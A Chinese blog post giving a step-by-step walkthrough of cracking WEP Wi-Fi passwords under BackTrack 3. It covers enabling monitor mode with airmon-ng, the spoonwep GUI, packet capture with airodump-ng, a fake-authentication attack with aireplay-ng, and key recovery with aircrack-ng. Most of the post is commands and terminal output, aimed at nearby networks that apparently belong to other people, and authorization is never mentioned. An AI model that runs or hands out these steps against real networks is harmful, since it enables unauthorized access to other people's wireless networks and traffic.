现在的位置: 首页 > 综合 > 正文

BT3下无线破解实战

2014年02月16日 ⁄ 综合 ⁄ 共 4846字 ⁄ 字号 评论关闭

Intel3945ABG在BT3下无线网络密码破解
===================================
网络上关于无线网络破解的工具有很多,我手头上就有几个:WinaircrackPack, CommView_for_wifi, BT3。

这几个工具运行环境和界面都不同,但是都是基于airodump-ng这个工具的基础之上。其中WinaircrackPack和Commview_for_wifi运行在windows 环境中,要求无线网卡驱动支持网络监听。如果不支持监听,则不能成功,使用中会报错。

BT3是个封装好的linux平台,里面有很多黑客工具,其实就是个黑客工具包。关于如何启动进入BT3有很多介绍可以在网上查询,下面只介绍如何用其中的工具进行破解:

首先启动BT3,进入图形界面,运行一个命令窗口。

root@bt:~# ifconfig -a (查看本机网卡)

eth0      Link encap:Ethernet  HWaddr 00:24:81:64:B7:3A
          inet addr:192.168.1.105  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:39 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:4774 (4.6 KiB)  TX bytes:1974 (1.9 KiB)
          Base address:0x4020 Memory:e4600000-e4620000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

wlan0     Link encap:Ethernet  HWaddr 00:1F:3C:D8:E9:E6
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

root@bt:~# airmon-ng start wlan0 (开始网络监听,error信息显示不支持或没有启动监听状态)

Interface       Chipset         Driver

wlan0           Intel 3945 a/b/g        iwl3945 - [phy0]

ERROR: Neither the sysfs interface links nor the iw command is available.
Please download and install iw from http://dl.aircrack-ng.org/iw.tar.bz2

root@bt:~# modprobe -r iwl3945 (查询状态)
root@bt:~# modprobe ipwraw (启动监听状态)
root@bt:~# airmon-ng start wlan0 (监听状态启动,无线网卡名称变为wifi0)

Interface       Chipset         Driver

wifi0           Centrino a/b/g  ipwraw-ng

一. 利用图形工具spoonwep

root@bt:~# spoonwep (启动spoonwep程序)

说明:该程序是个图形界面,在第一个页面里选择网卡(wifi0)、网卡类型(normal)、是否知道要破解的无线网。 点击下一步。

如果知道要破解的无线网,则在第二个页面里必须填写无线网的MAC地址。接下来就是等待自动破解了, 速度快的话很快就能看到破解的KEY了,^_^。

如果选择了不知道则程序自动扫描能发现的无线网,会比较慢。然后选择一个进行破解,和上面一样。

二. 完全命令行程序

root@bt:~# airmon-ng start wifi0 6 (将监听网卡换成wifi0, 6 是无线频道,依据实际情况调整)

Interface       Chipset         Driver

wifi0           Centrino a/b/g  ipwraw-ng (monitor mode enabled)

root@bt:~# airodump-ng --ivs -w default -c 6 wifi0(抓数据包,default是无线网的名称,根据实际情况调整。程序会在当前目录下生成default-01.ivs文件)

 CH  6 ][ Elapsed: 14 mins ][ 2009-08-01 14:12

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:19:E0:94:46:D6    0   0       39        0    0   6  54. WPA2 CCMP   PSK  <length:  6>
 00:13:46:50:C8:C9    0   0       48        0    0   6  54. WEP  WEP         default
 00:21:27:6E:0E:A6    0   1     3047       16    0   6  54. WEP  WEP         worldwise
 00:25:86:27:7B:A2    0  29     1996        0    0   6  54. WEP  WEP         TP-LINK_277BA0
 00:1E:58:0F:AA:0A    0  39     5206        0    0   6  54. WEP  WEP         erichou
 00:03:7F:BF:01:A2    0   0      549        0    0   6  54. WPA  CCMP   PSK  ALPHA AFW-GR50
 00:18:39:3A:58:9A    0   0      238        9    0   6  54  WEP  WEP         lillian

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

 00:13:46:50:C8:C9  00:24:2B:F5:23:82    0   0- 0    12      979  default
 00:21:27:6E:0E:A6  00:1F:3B:D0:DE:23    0   0- 0     0       11
 00:18:39:3A:58:9A  00:1B:63:C6:EB:60   -1   0- 0     0        6
 (not associated)   00:13:02:51:DA:A9    0   0- 0     0       39  KFC-007
 (not associated)   00:19:D2:4E:B6:C4    0   0- 0     0      102  azhi
 (not associated)   00:18:F3:45:5D:8B    0   0- 0     0       21  TP-LINK_8DCFDC,linksys1

(运行另外一个命令窗口,运行破解)

root@bt:~# aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac wifi0

Sending Authentication Request  

Authentication successful 

Sending Association Request    

Association successful :-)

 

这时,airodump-ng窗口的变化

这时候等Data有了1万5就可新开个命令窗口,用aircrack-ng来破解了。

root@bt:~# aircrack-ng default-01.ivs
Opening default-01.ivs
Read 31 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1E:58:0F:AA:0A  erichou                   Unknown
   2  00:25:86:27:7B:A2  TP-LINK_277BA0            Unknown
   3  00:21:27:6E:0E:A6  worldwise                 WEP (16 IVs)  (实际情况中IVS必须10000以上才可以破解)
   4  00:13:46:50:C8:C9  default                   Unknown
   5  00:03:7F:BF:01:A2  ALPHA AFW-GR50            Unknown
   6  00:18:39:3A:58:9A  lillian                   WEP (9 IVs)   (实际情况中IVS必须10000以上才可以破解)

Index number of target network ? 3

Opening default-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 16 ivs.

                                            Aircrack-ng 1.0 rc1 r1085

                            [00:00:08] Tested 148993 keys (got 16 IVs)

   KB    depth   byte(vote)
    0  255/256   FF(   0) 1D( 220) 1E( 220) 3A( 220) 76( 220) 7C( 220) 7E( 220)
    1    0/ 10   AA( 440) 08( 220) 3F( 220) 45( 220) 4F( 220) 76( 220) 7A( 220)
    2   16/  2   ED(  72) 10(  36) 14(  36) 19(  36) 2B(  36) 30(  36) 34(  36)
    3    0/  1   1A( 440) 06( 220) 20( 220) 32( 220) 3E( 220) 49( 220) 56( 220)
    4    2/  4   B6( 256) 0A( 220) 15( 220) 3D( 220) 6F( 220) 7C( 220) 83( 220)

Failed. Next try with 5000 IVs.(这种情况就是ivs太少,实际情况中IVS必须10000以上才可以破解)

 

抱歉!评论已关闭.